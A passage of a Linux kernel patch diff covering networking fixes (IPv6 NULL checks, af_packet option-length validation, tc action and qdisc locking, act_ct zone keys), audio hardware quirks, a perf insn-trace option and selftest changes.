+index 4c9da94553365..d85dd394d5b44 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -6146,6 +6146,7 @@ static bool tcp_rcv_fastopen_synack(struct sock *sk, struct sk_buff *synack,
+ 		skb_rbtree_walk_from(data)
+ 			 tcp_mark_skb_lost(sk, data);
+ 		tcp_xmit_retransmit_queue(sk);
++		tp->retrans_stamp = 0;
+ 		NET_INC_STATS(sock_net(sk),
+ 				LINUX_MIB_TCPFASTOPENACTIVEFAIL);
+ 		return true;
+diff --git a/net/ipv6/route.c b/net/ipv6/route.c
+index d305051e8ab5f..151414e9f7fe4 100644
+--- a/net/ipv6/route.c
++++ b/net/ipv6/route.c
+@@ -640,6 +640,8 @@ static void rt6_probe(struct fib6_nh *fib6_nh)
+ 	rcu_read_lock();
+ 	last_probe = READ_ONCE(fib6_nh->last_probe);
+ 	idev = __in6_dev_get(dev);
++	if (!idev)
++		goto out;
+ 	neigh = __ipv6_neigh_lookup_noref(dev, nh_gw);
+ 	if (neigh) {
+ 		if (READ_ONCE(neigh->nud_state) & NUD_VALID)
+@@ -3592,7 +3594,7 @@ int fib6_nh_init(struct net *net, struct fib6_nh *fib6_nh,
+ 	if (!dev)
+ 		goto out;
+ 
+-	if (idev->cnf.disable_ipv6) {
++	if (!idev || idev->cnf.disable_ipv6) {
+ 		NL_SET_ERR_MSG(extack, "IPv6 is disabled on nexthop device");
+ 		err = -EACCES;
+ 		goto out;
+diff --git a/net/ipv6/seg6_local.c b/net/ipv6/seg6_local.c
+index 8370726ae7bf1..33cb0381b5749 100644
+--- a/net/ipv6/seg6_local.c
++++ b/net/ipv6/seg6_local.c
+@@ -554,8 +554,8 @@ static int input_action_end_dx6(struct sk_buff *skb,
+ 
+ 	if (static_branch_unlikely(&nf_hooks_lwtunnel_enabled))
+ 		return NF_HOOK(NFPROTO_IPV6, NF_INET_PRE_ROUTING,
+-			       dev_net(skb->dev), NULL, skb, NULL,
+-			       skb_dst(skb)->dev, input_action_end_dx6_finish);
++			       dev_net(skb->dev), NULL, skb, skb->dev,
++			       NULL, input_action_end_dx6_finish);
+ 
+ 	return input_action_end_dx6_finish(dev_net(skb->dev), NULL, skb);
+ drop:
+@@ -604,8 +604,8 @@ static int input_action_end_dx4(struct sk_buff *skb,
+ 
+ 	if (static_branch_unlikely(&nf_hooks_lwtunnel_enabled))
+ 		return NF_HOOK(NFPROTO_IPV4, NF_INET_PRE_ROUTING,
+-			       dev_net(skb->dev), NULL, skb, NULL,
+-			       skb_dst(skb)->dev, input_action_end_dx4_finish);
++			       dev_net(skb->dev), NULL, skb, skb->dev,
++			       NULL, input_action_end_dx4_finish);
+ 
+ 	return input_action_end_dx4_finish(dev_net(skb->dev), NULL, skb);
+ drop:
+diff --git a/net/ipv6/xfrm6_policy.c b/net/ipv6/xfrm6_policy.c
+index f0053087d2e47..b7b5dbf5d037b 100644
+--- a/net/ipv6/xfrm6_policy.c
++++ b/net/ipv6/xfrm6_policy.c
+@@ -56,12 +56,18 @@ static int xfrm6_get_saddr(struct net *net, int oif,
+ {
+ 	struct dst_entry *dst;
+ 	struct net_device *dev;
++	struct inet6_dev *idev;
+ 
+ 	dst = xfrm6_dst_lookup(net, 0, oif, NULL, daddr, mark);
+ 	if (IS_ERR(dst))
+ 		return -EHOSTUNREACH;
+ 
+-	dev = ip6_dst_idev(dst)->dev;
++	idev = ip6_dst_idev(dst);
++	if (!idev) {
++		dst_release(dst);
++		return -EHOSTUNREACH;
++	}
++	dev = idev->dev;
+ 	ipv6_dev_get_saddr(dev_net(dev), dev, &daddr->in6, 0, &saddr->in6);
+ 	dst_release(dst);
+ 	return 0;
+diff --git a/net/netfilter/ipset/ip_set_core.c b/net/netfilter/ipset/ip_set_core.c
+index 649b8a5901e33..0b24b638bfd2e 100644
+--- a/net/netfilter/ipset/ip_set_core.c
++++ b/net/netfilter/ipset/ip_set_core.c
+@@ -53,12 +53,13 @@ MODULE_DESCRIPTION("core IP set support");
+ MODULE_ALIAS_NFNL_SUBSYS(NFNL_SUBSYS_IPSET);
+ 
+ /* When the nfnl mutex or ip_set_ref_lock is held: */
+-#define ip_set_dereference(p)		\
+-	rcu_dereference_protected(p,	\
++#define ip_set_dereference(inst)	\
++	rcu_dereference_protected((inst)->ip_set_list,	\
+ 		lockdep_nfnl_is_held(NFNL_SUBSYS_IPSET) || \
+-		lockdep_is_held(&ip_set_ref_lock))
++		lockdep_is_held(&ip_set_ref_lock) || \
++		(inst)->is_deleted)
+ #define ip_set(inst, id)		\
+-	ip_set_dereference((inst)->ip_set_list)[id]
++	ip_set_dereference(inst)[id]
+ #define ip_set_ref_netlink(inst,id)	\
+ 	rcu_dereference_raw((inst)->ip_set_list)[id]
+ #define ip_set_dereference_nfnl(p)	\
+@@ -1135,7 +1136,7 @@ static int ip_set_create(struct sk_buff *skb, const struct nfnl_info *info,
+ 		if (!list)
+ 			goto cleanup;
+ 		/* nfnl mutex is held, both lists are valid */
+-		tmp = ip_set_dereference(inst->ip_set_list);
++		tmp = ip_set_dereference(inst);
+ 		memcpy(list, tmp, sizeof(struct ip_set *) * inst->ip_set_max);
+ 		rcu_assign_pointer(inst->ip_set_list, list);
+ 		/* Make sure all current packets have passed through */
+diff --git a/net/netrom/nr_timer.c b/net/netrom/nr_timer.c
+index 4e7c968cde2dc..5e3ca068f04e0 100644
+--- a/net/netrom/nr_timer.c
++++ b/net/netrom/nr_timer.c
+@@ -121,7 +121,8 @@ static void nr_heartbeat_expiry(struct timer_list *t)
+ 		   is accepted() it isn't 'dead' so doesn't get removed. */
+ 		if (sock_flag(sk, SOCK_DESTROY) ||
+ 		    (sk->sk_state == TCP_LISTEN && sock_flag(sk, SOCK_DEAD))) {
+-			sock_hold(sk);
++			if (sk->sk_state == TCP_LISTEN)
++				sock_hold(sk);
+ 			bh_unlock_sock(sk);
+ 			nr_destroy_socket(sk);
+ 			goto out;
+diff --git a/net/packet/af_packet.c b/net/packet/af_packet.c
+index 8888c09931ce3..c48cb7664c552 100644
+--- a/net/packet/af_packet.c
++++ b/net/packet/af_packet.c
+@@ -3791,28 +3791,30 @@ packet_setsockopt(struct socket *sock, int level, int optname, sockptr_t optval,
+ 	case PACKET_TX_RING:
+ 	{
+ 		union tpacket_req_u req_u;
+-		int len;
+ 
++		ret = -EINVAL;
+ 		lock_sock(sk);
+ 		switch (po->tp_version) {
+ 		case TPACKET_V1:
+ 		case TPACKET_V2:
+-			len = sizeof(req_u.req);
++			if (optlen < sizeof(req_u.req))
++				break;
++			ret = copy_from_sockptr(&req_u.req, optval,
++						sizeof(req_u.req)) ?
++						-EINVAL : 0;
+ 			break;
+ 		case TPACKET_V3:
+ 		default:
+-			len = sizeof(req_u.req3);
++			if (optlen < sizeof(req_u.req3))
++				break;
++			ret = copy_from_sockptr(&req_u.req3, optval,
++						sizeof(req_u.req3)) ?
++						-EINVAL : 0;
+ 			break;
+ 		}
+-		if (optlen < len) {
+-			ret = -EINVAL;
+-		} else {
+-			if (copy_from_sockptr(&req_u.req, optval, len))
+-				ret = -EFAULT;
+-			else
+-				ret = packet_set_ring(sk, &req_u, 0,
+-						    optname == PACKET_TX_RING);
+-		}
++		if (!ret)
++			ret = packet_set_ring(sk, &req_u, 0,
++					      optname == PACKET_TX_RING);
+ 		release_sock(sk);
+ 		return ret;
+ 	}
+diff --git a/net/sched/act_api.c b/net/sched/act_api.c
+index b33f88e50aa90..5a361deb804a3 100644
+--- a/net/sched/act_api.c
++++ b/net/sched/act_api.c
+@@ -820,6 +820,9 @@ EXPORT_SYMBOL(tcf_idr_cleanup);
+  * its reference and bind counters, and return 1. Otherwise insert temporary
+  * error pointer (to prevent concurrent users from inserting actions with same
+  * index) and return 0.
++ *
++ * May return -EAGAIN for binding actions in case of a parallel add/delete on
++ * the requested index.
+  */
+ 
+ int tcf_idr_check_alloc(struct tc_action_net *tn, u32 *index,
+@@ -828,43 +831,60 @@ int tcf_idr_check_alloc(struct tc_action_net *tn, u32 *index,
+ 	struct tcf_idrinfo *idrinfo = tn->idrinfo;
+ 	struct tc_action *p;
+ 	int ret;
++	u32 max;
+ 
+-again:
+-	mutex_lock(&idrinfo->lock);
+ 	if (*index) {
++		rcu_read_lock();
+ 		p = idr_find(&idrinfo->action_idr, *index);
++
+ 		if (IS_ERR(p)) {
+ 			/* This means that another process allocated
+ 			 * index but did not assign the pointer yet.
+ 			 */
+-			mutex_unlock(&idrinfo->lock);
+-			goto again;
++			rcu_read_unlock();
++			return -EAGAIN;
+ 		}
+ 
+-		if (p) {
+-			refcount_inc(&p->tcfa_refcnt);
+-			if (bind)
+-				atomic_inc(&p->tcfa_bindcnt);
+-			*a = p;
+-			ret = 1;
+-		} else {
+-			*a = NULL;
+-			ret = idr_alloc_u32(&idrinfo->action_idr, NULL, index,
+-					    *index, GFP_KERNEL);
+-			if (!ret)
+-				idr_replace(&idrinfo->action_idr,
+-					    ERR_PTR(-EBUSY), *index);
++		if (!p) {
++			/* Empty slot, try to allocate it */
++			max = *index;
++			rcu_read_unlock();
++			goto new;
+ 		}
++
++		if (!refcount_inc_not_zero(&p->tcfa_refcnt)) {
++			/* Action was deleted in parallel */
++			rcu_read_unlock();
++			return -EAGAIN;
++		}
++
++		if (bind)
++			atomic_inc(&p->tcfa_bindcnt);
++		*a = p;
++
++		rcu_read_unlock();
++
++		return 1;
+ 	} else {
++		/* Find a slot */
+ 		*index = 1;
+-		*a = NULL;
+-		ret = idr_alloc_u32(&idrinfo->action_idr, NULL, index,
+-				    UINT_MAX, GFP_KERNEL);
+-		if (!ret)
+-			idr_replace(&idrinfo->action_idr, ERR_PTR(-EBUSY),
+-				    *index);
++		max = UINT_MAX;
+ 	}
++
++new:
++	*a = NULL;
++
++	mutex_lock(&idrinfo->lock);
++	ret = idr_alloc_u32(&idrinfo->action_idr, ERR_PTR(-EBUSY), index, max,
++			    GFP_KERNEL);
+ 	mutex_unlock(&idrinfo->lock);
++
++	/* N binds raced for action allocation,
++	 * retry for all the ones that failed.
++	 */
++	if (ret == -ENOSPC && *index == max)
++		ret = -EAGAIN;
++
+ 	return ret;
+ }
+ EXPORT_SYMBOL(tcf_idr_check_alloc);
+diff --git a/net/sched/act_ct.c b/net/sched/act_ct.c
+index 84e15116f18c2..cd95a315fde82 100644
+--- a/net/sched/act_ct.c
++++ b/net/sched/act_ct.c
+@@ -39,21 +39,26 @@ static struct workqueue_struct *act_ct_wq;
+ static struct rhashtable zones_ht;
+ static DEFINE_MUTEX(zones_mutex);
+ 
++struct zones_ht_key {
++	struct net *net;
++	u16 zone;
++};
++
+ struct tcf_ct_flow_table {
+ 	struct rhash_head node; /* In zones tables */
+ 
+ 	struct rcu_work rwork;
+ 	struct nf_flowtable nf_ft;
+ 	refcount_t ref;
+-	u16 zone;
++	struct zones_ht_key key;
+ 
+ 	bool dying;
+ };
+ 
+ static const struct rhashtable_params zones_params = {
+ 	.head_offset = offsetof(struct tcf_ct_flow_table, node),
+-	.key_offset = offsetof(struct tcf_ct_flow_table, zone),
+-	.key_len = sizeof_field(struct tcf_ct_flow_table, zone),
++	.key_offset = offsetof(struct tcf_ct_flow_table, key),
++	.key_len = sizeof_field(struct tcf_ct_flow_table, key),
+ 	.automatic_shrinking = true,
+ };
+ 
+@@ -312,11 +317,12 @@ static struct nf_flowtable_type flowtable_ct = {
+ 
+ static int tcf_ct_flow_table_get(struct net *net, struct tcf_ct_params *params)
+ {
++	struct zones_ht_key key = { .net = net, .zone = params->zone };
+ 	struct tcf_ct_flow_table *ct_ft;
+ 	int err = -ENOMEM;
+ 
+ 	mutex_lock(&zones_mutex);
+-	ct_ft = rhashtable_lookup_fast(&zones_ht, &params->zone, zones_params);
++	ct_ft = rhashtable_lookup_fast(&zones_ht, &key, zones_params);
+ 	if (ct_ft && refcount_inc_not_zero(&ct_ft->ref))
+ 		goto out_unlock;
+ 
+@@ -325,7 +331,7 @@ static int tcf_ct_flow_table_get(struct net *net, struct tcf_ct_params *params)
+ 		goto err_alloc;
+ 	refcount_set(&ct_ft->ref, 1);
+ 
+-	ct_ft->zone = params->zone;
++	ct_ft->key = key;
+ 	err = rhashtable_insert_fast(&zones_ht, &ct_ft->node, zones_params);
+ 	if (err)
+ 		goto err_insert;
+diff --git a/net/sched/sch_api.c b/net/sched/sch_api.c
+index 334a563e0bc14..bf8e45ffc2986 100644
+--- a/net/sched/sch_api.c
++++ b/net/sched/sch_api.c
+@@ -1353,6 +1353,7 @@ static struct Qdisc *qdisc_create(struct net_device *dev,
+ 	if (ops->destroy)
+ 		ops->destroy(sch);
+ err_out3:
++	lockdep_unregister_key(&sch->root_lock_key);
+ 	netdev_put(dev, &sch->dev_tracker);
+ 	qdisc_free(sch);
+ err_out2:
+diff --git a/net/sched/sch_generic.c b/net/sched/sch_generic.c
+index a5693e25b2482..7053c0292c335 100644
+--- a/net/sched/sch_generic.c
++++ b/net/sched/sch_generic.c
+@@ -942,7 +942,9 @@ struct Qdisc *qdisc_alloc(struct netdev_queue *dev_queue,
+ 	__skb_queue_head_init(&sch->gso_skb);
+ 	__skb_queue_head_init(&sch->skb_bad_txq);
+ 	gnet_stats_basic_sync_init(&sch->bstats);
++	lockdep_register_key(&sch->root_lock_key);
+ 	spin_lock_init(&sch->q.lock);
++	lockdep_set_class(&sch->q.lock, &sch->root_lock_key);
+ 
+ 	if (ops->static_flags & TCQ_F_CPUSTATS) {
+ 		sch->cpu_bstats =
+@@ -976,6 +978,7 @@ struct Qdisc *qdisc_alloc(struct netdev_queue *dev_queue,
+ 
+ 	return sch;
+ errout1:
++	lockdep_unregister_key(&sch->root_lock_key);
+ 	kfree(sch);
+ errout:
+ 	return ERR_PTR(err);
+@@ -1062,6 +1065,7 @@ static void __qdisc_destroy(struct Qdisc *qdisc)
+ 	if (ops->destroy)
+ 		ops->destroy(qdisc);
+ 
++	lockdep_unregister_key(&qdisc->root_lock_key);
+ 	module_put(ops->owner);
+ 	netdev_put(qdisc_dev(qdisc), &qdisc->dev_tracker);
+ 
+diff --git a/net/sched/sch_htb.c b/net/sched/sch_htb.c
+index 67b1879ea8e10..d23f8ea630820 100644
+--- a/net/sched/sch_htb.c
++++ b/net/sched/sch_htb.c
+@@ -1036,13 +1036,6 @@ static void htb_work_func(struct work_struct *work)
+ 	rcu_read_unlock();
+ }
+ 
+-static void htb_set_lockdep_class_child(struct Qdisc *q)
+-{
+-	static struct lock_class_key child_key;
+-
+-	lockdep_set_class(qdisc_lock(q), &child_key);
+-}
+-
+ static int htb_offload(struct net_device *dev, struct tc_htb_qopt_offload *opt)
+ {
+ 	return dev->netdev_ops->ndo_setup_tc(dev, TC_SETUP_QDISC_HTB, opt);
+@@ -1129,7 +1122,6 @@ static int htb_init(struct Qdisc *sch, struct nlattr *opt,
+ 			return -ENOMEM;
+ 		}
+ 
+-		htb_set_lockdep_class_child(qdisc);
+ 		q->direct_qdiscs[ntx] = qdisc;
+ 		qdisc->flags |= TCQ_F_ONETXQUEUE | TCQ_F_NOPARENT;
+ 	}
+@@ -1465,7 +1457,6 @@ static int htb_graft(struct Qdisc *sch, unsigned long arg, struct Qdisc *new,
+ 	}
+ 
+ 	if (q->offload) {
+-		htb_set_lockdep_class_child(new);
+ 		/* One ref for cl->leaf.q, the other for dev_queue->qdisc. */
+ 		qdisc_refcount_inc(new);
+ 		old_q = htb_graft_helper(dev_queue, new);
+@@ -1728,11 +1719,8 @@ static int htb_delete(struct Qdisc *sch, unsigned long arg,
+ 		new_q = qdisc_create_dflt(dev_queue, &pfifo_qdisc_ops,
+ 					  cl->parent->common.classid,
+ 					  NULL);
+-		if (q->offload) {
+-			if (new_q)
+-				htb_set_lockdep_class_child(new_q);
++		if (q->offload)
+ 			htb_parent_to_leaf_offload(sch, dev_queue, new_q);
+-		}
+ 	}
+ 
+ 	sch_tree_lock(sch);
+@@ -1946,13 +1934,9 @@ static int htb_change_class(struct Qdisc *sch, u32 classid,
+ 		new_q = qdisc_create_dflt(dev_queue, &pfifo_qdisc_ops,
+ 					  classid, NULL);
+ 		if (q->offload) {
+-			if (new_q) {
+-				htb_set_lockdep_class_child(new_q);
+-				/* One ref for cl->leaf.q, the other for
+-				 * dev_queue->qdisc.
+-				 */
++			/* One ref for cl->leaf.q, the other for dev_queue->qdisc. */
++			if (new_q)
+ 				qdisc_refcount_inc(new_q);
+-			}
+ 			old_q = htb_graft_helper(dev_queue, new_q);
+ 			/* No qdisc_put needed. */
+ 			WARN_ON(!(old_q->flags & TCQ_F_BUILTIN));
+diff --git a/net/tipc/node.c b/net/tipc/node.c
+index a9c5b6594889b..cf9d9f9b97844 100644
+--- a/net/tipc/node.c
++++ b/net/tipc/node.c
+@@ -2107,6 +2107,7 @@ void tipc_rcv(struct net *net, struct sk_buff *skb, struct tipc_bearer *b)
+ 	} else {
+ 		n = tipc_node_find_by_id(net, ehdr->id);
+ 	}
++	skb_dst_force(skb);
+ 	tipc_crypto_rcv(net, (n) ? n->crypto_rx : NULL, &skb, b);
+ 	if (!skb)
+ 		return;
+diff --git a/sound/hda/intel-dsp-config.c b/sound/hda/intel-dsp-config.c
+index f1de386604a10..5ada28b5515c9 100644
+--- a/sound/hda/intel-dsp-config.c
++++ b/sound/hda/intel-dsp-config.c
+@@ -16,7 +16,7 @@
+ static int dsp_driver;
+ 
+ module_param(dsp_driver, int, 0444);
+-MODULE_PARM_DESC(dsp_driver, "Force the DSP driver for Intel DSP (0=auto, 1=legacy, 2=SST, 3=SOF)");
++MODULE_PARM_DESC(dsp_driver, "Force the DSP driver for Intel DSP (0=auto, 1=legacy, 2=SST, 3=SOF, 4=AVS)");
+ 
+ #define FLAG_SST			BIT(0)
+ #define FLAG_SOF			BIT(1)
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 3a7104f72cabd..60866e8e1d961 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -9803,6 +9803,10 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8c70, "HP EliteBook 835 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c71, "HP EliteBook 845 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c72, "HP EliteBook 865 G11", ALC287_FIXUP_CS35L41_I2C_2_HP_GPIO_LED),
++	SND_PCI_QUIRK(0x103c, 0x8c7b, "HP ProBook 445 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7c, "HP ProBook 445 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7d, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
++	SND_PCI_QUIRK(0x103c, 0x8c7e, "HP ProBook 465 G11", ALC236_FIXUP_HP_MUTE_LED_MICMUTE_VREF),
+ 	SND_PCI_QUIRK(0x103c, 0x8c89, "HP ProBook 460 G11", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8a, "HP EliteBook 630", ALC236_FIXUP_HP_GPIO_LED),
+ 	SND_PCI_QUIRK(0x103c, 0x8c8c, "HP EliteBook 660", ALC236_FIXUP_HP_GPIO_LED),
+@@ -10079,7 +10083,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3813, "Legion 7i 15IMHG05", ALC287_FIXUP_LEGION_15IMHG05_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3818, "Lenovo C940 / Yoga Duet 7", ALC298_FIXUP_LENOVO_C940_DUET7),
+ 	SND_PCI_QUIRK(0x17aa, 0x3819, "Lenovo 13s Gen2 ITL", ALC287_FIXUP_13S_GEN2_SPEAKERS),
+-	SND_PCI_QUIRK(0x17aa, 0x3820, "Yoga Duet 7 13ITL6", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
++	SND_PCI_QUIRK(0x17aa, 0x3820, "IdeaPad 330-17IKB 81DM", ALC269_FIXUP_ASPIRE_HEADSET_MIC),
+ 	SND_PCI_QUIRK(0x17aa, 0x3824, "Legion Y9000X 2020", ALC285_FIXUP_LEGION_Y9000X_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3827, "Ideapad S740", ALC285_FIXUP_IDEAPAD_S740_COEF),
+ 	SND_PCI_QUIRK(0x17aa, 0x3834, "Lenovo IdeaPad Slim 9i 14ITL5", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+@@ -10090,6 +10094,8 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x3852, "Lenovo Yoga 7 14ITL5", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3853, "Lenovo Yoga 7 15ITL5", ALC287_FIXUP_YOGA7_14ITL_SPEAKERS),
+ 	SND_PCI_QUIRK(0x17aa, 0x3855, "Legion 7 16ITHG6", ALC287_FIXUP_LEGION_16ITHG6),
++	SND_PCI_QUIRK(0x17aa, 0x3865, "Lenovo 13X", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x3866, "Lenovo 13X", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x3869, "Lenovo Yoga7 14IAL7", ALC287_FIXUP_YOGA9_14IAP7_BASS_SPK_PIN),
+ 	SND_PCI_QUIRK(0x17aa, 0x3902, "Lenovo E50-80", ALC269_FIXUP_DMIC_THINKPAD_ACPI),
+ 	SND_PCI_QUIRK(0x17aa, 0x3977, "IdeaPad S210", ALC283_FIXUP_INT_MIC),
+@@ -10126,6 +10132,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1b7d, 0xa831, "Ordissimo EVE2 ", ALC269VB_FIXUP_ORDISSIMO_EVE2), /* Also known as Malata PC-B1303 */
+ 	SND_PCI_QUIRK(0x1c06, 0x2013, "Lemote A1802", ALC269_FIXUP_LEMOTE_A1802),
+ 	SND_PCI_QUIRK(0x1c06, 0x2015, "Lemote A190X", ALC269_FIXUP_LEMOTE_A190X),
++	SND_PCI_QUIRK(0x1c6c, 0x122a, "Positivo N14AP7", ALC269_FIXUP_LIMIT_INT_MIC_BOOST),
+ 	SND_PCI_QUIRK(0x1c6c, 0x1251, "Positivo N14KP6-TG", ALC288_FIXUP_DELL1_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1d05, 0x1132, "TongFang PHxTxX1", ALC256_FIXUP_SET_COEF_DEFAULTS),
+ 	SND_PCI_QUIRK(0x1d05, 0x1096, "TongFang GMxMRxx", ALC269_FIXUP_NO_SHUTUP),
+@@ -10150,7 +10157,6 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x8086, 0x2081, "Intel NUC 10", ALC256_FIXUP_INTEL_NUC10),
+ 	SND_PCI_QUIRK(0x8086, 0x3038, "Intel NUC 13", ALC295_FIXUP_CHROME_BOOK),
+ 	SND_PCI_QUIRK(0xf111, 0x0001, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+-	SND_PCI_QUIRK(0xf111, 0x0005, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0xf111, 0x0006, "Framework Laptop", ALC295_FIXUP_FRAMEWORK_LAPTOP_MIC_NO_PRESENCE),
+ 
+ #if 0
+diff --git a/sound/soc/intel/boards/sof_sdw.c b/sound/soc/intel/boards/sof_sdw.c
+index d1e6e4208c376..d03de37e3578c 100644
+--- a/sound/soc/intel/boards/sof_sdw.c
++++ b/sound/soc/intel/boards/sof_sdw.c
+@@ -413,6 +413,15 @@ static const struct dmi_system_id sof_sdw_quirk_table[] = {
+ 					SOF_BT_OFFLOAD_SSP(1) |
+ 					SOF_SSP_BT_OFFLOAD_PRESENT),
+ 	},
++	{
++		.callback = sof_sdw_quirk_cb,
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "HP"),
++			DMI_MATCH(DMI_PRODUCT_NAME, "OMEN Transcend Gaming Laptop"),
++		},
++		.driver_data = (void *)(RT711_JD2),
++	},
++
+ 	/* LunarLake devices */
+ 	{
+ 		.callback = sof_sdw_quirk_cb,
+diff --git a/tools/perf/Documentation/perf-script.txt b/tools/perf/Documentation/perf-script.txt
+index 68e37de5fae47..96ec1dec9efe3 100644
+--- a/tools/perf/Documentation/perf-script.txt
++++ b/tools/perf/Documentation/perf-script.txt
+@@ -438,9 +438,10 @@ include::itrace.txt[]
+ 	will be printed. Each entry has function name and file/line. Enabled by
+ 	default, disable with --no-inline.
+ 
+---insn-trace::
+-	Show instruction stream for intel_pt traces. Combine with --xed to
+-	show disassembly.
++--insn-trace[=<raw|disasm>]::
++	Show instruction stream in bytes (raw) or disassembled (disasm)
++	for intel_pt traces. The default is 'raw'. To use xed, combine
++	'raw' with --xed to show disassembly done by xed.
+ 
+ --xed::
+ 	Run xed disassembler on output. Requires installing the xed disassembler.
+diff --git a/tools/perf/builtin-script.c b/tools/perf/builtin-script.c
+index a794a3d2e47b7..999231d64e225 100644
+--- a/tools/perf/builtin-script.c
++++ b/tools/perf/builtin-script.c
+@@ -3712,11 +3712,25 @@ static int perf_script__process_auxtrace_info(struct perf_session *session,
+ #endif
+ 
+ static int parse_insn_trace(const struct option *opt __maybe_unused,
+-			    const char *str __maybe_unused,
+-			    int unset __maybe_unused)
++			    const char *str, int unset __maybe_unused)
+ {
+-	parse_output_fields(NULL, "+insn,-event,-period", 0);
+-	itrace_parse_synth_opts(opt, "i0ns", 0);
++	const char *fields = "+insn,-event,-period";
++	int ret;
++
++	if (str) {
++		if (strcmp(str, "disasm") == 0)
++			fields = "+disasm,-event,-period";
++		else if (strlen(str) != 0 && strcmp(str, "raw") != 0) {
++			fprintf(stderr, "Only accept raw|disasm\n");
++			return -EINVAL;
++		}
++	}
++
++	ret = parse_output_fields(NULL, fields, 0);
++	if (ret < 0)
++		return ret;
++
++	itrace_parse_synth_opts(opt, "i0nse", 0);
+ 	symbol_conf.nanosecs = true;
+ 	return 0;
+ }
+@@ -3859,7 +3873,7 @@ int cmd_script(int argc, const char **argv)
+ 		   "only consider these symbols"),
+ 	OPT_INTEGER(0, "addr-range", &symbol_conf.addr_range,
+ 		    "Use with -S to list traced records within address range"),
+-	OPT_CALLBACK_OPTARG(0, "insn-trace", &itrace_synth_opts, NULL, NULL,
++	OPT_CALLBACK_OPTARG(0, "insn-trace", &itrace_synth_opts, NULL, "raw|disasm",
+ 			"Decode instructions from itrace", parse_insn_trace),
+ 	OPT_CALLBACK_OPTARG(0, "xed", NULL, NULL, NULL,
+ 			"Run xed disassembler on output", parse_xed),
+diff --git a/tools/testing/selftests/arm64/tags/tags_test.c b/tools/testing/selftests/arm64/tags/tags_test.c
+index 5701163460ef7..955f87c1170d7 100644
+--- a/tools/testing/selftests/arm64/tags/tags_test.c
++++ b/tools/testing/selftests/arm64/tags/tags_test.c
+@@ -6,6 +6,7 @@
+ #include <stdint.h>
+ #include <sys/prctl.h>
+ #include <sys/utsname.h>
++#include "../../kselftest.h"
+ 
+ #define SHIFT_TAG(tag)		((uint64_t)(tag) << 56)
+ #define SET_TAG(ptr, tag)	(((uint64_t)(ptr) & ~SHIFT_TAG(0xff)) | \
+@@ -21,6 +22,9 @@ int main(void)
+ 	if (prctl(PR_SET_TAGGED_ADDR_CTRL, PR_TAGGED_ADDR_ENABLE, 0, 0, 0) == 0)
+ 		tbi_enabled = 1;
+ 	ptr = (struct utsname *)malloc(sizeof(*ptr));
++	if (!ptr)
++		ksft_exit_fail_msg("Failed to allocate utsname buffer\n");
++
+ 	if (tbi_enabled)
+ 		tag = 0x42;
+ 	ptr = (struct utsname *)SET_TAG(ptr, tag);
+diff --git a/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c b/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c
+index eb90a6b8850d2..f4d753185001a 100644
+--- a/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c
++++ b/tools/testing/selftests/bpf/prog_tests/btf_map_in_map.c
+@@ -25,7 +25,7 @@ static void test_lookup_update(void)
+ 	int map1_fd, map2_fd, map3_fd, map4_fd, map5_fd, map1_id, map2_id;
+ 	int outer_arr_fd, outer_hash_fd, outer_arr_dyn_fd;
+ 	struct test_btf_map_in_map *skel;
+-	int err, key = 0, val, i, fd;
++	int err, key = 0, val, i;
+ 
+ 	skel = test_btf_map_in_map__open_and_load();
+ 	if (CHECK(!skel, "skel_open", "failed to open&load skeleton\n"))
+@@ -102,30 +102,6 @@ static void test_lookup_update(void)
+ 	CHECK(map1_id == 0, "map1_id", "failed to get ID 1\n");
+ 	CHECK(map2_id == 0, "map2_id", "failed to get ID 2\n");
+ 
+-	test_btf_map_in_map__destroy(skel);
+-	skel = NULL;
+-
+-	/* we need to either wait for or force synchronize_rcu(), before
+-	 * checking for "still exists" condition, otherwise map could still be
+-	 * resolvable by ID, causing false positives.
+-	 *
+-	 * Older kernels (5.8 and earlier) freed map only after two
+-	 * synchronize_rcu()s, so trigger two, to be entirely sure.
+-	 */
+-	CHECK(kern_sync_rcu(), "sync_rcu", "failed\n");
+-	CHECK(kern_sync_rcu(), "sync_rcu", "failed\n");
+-
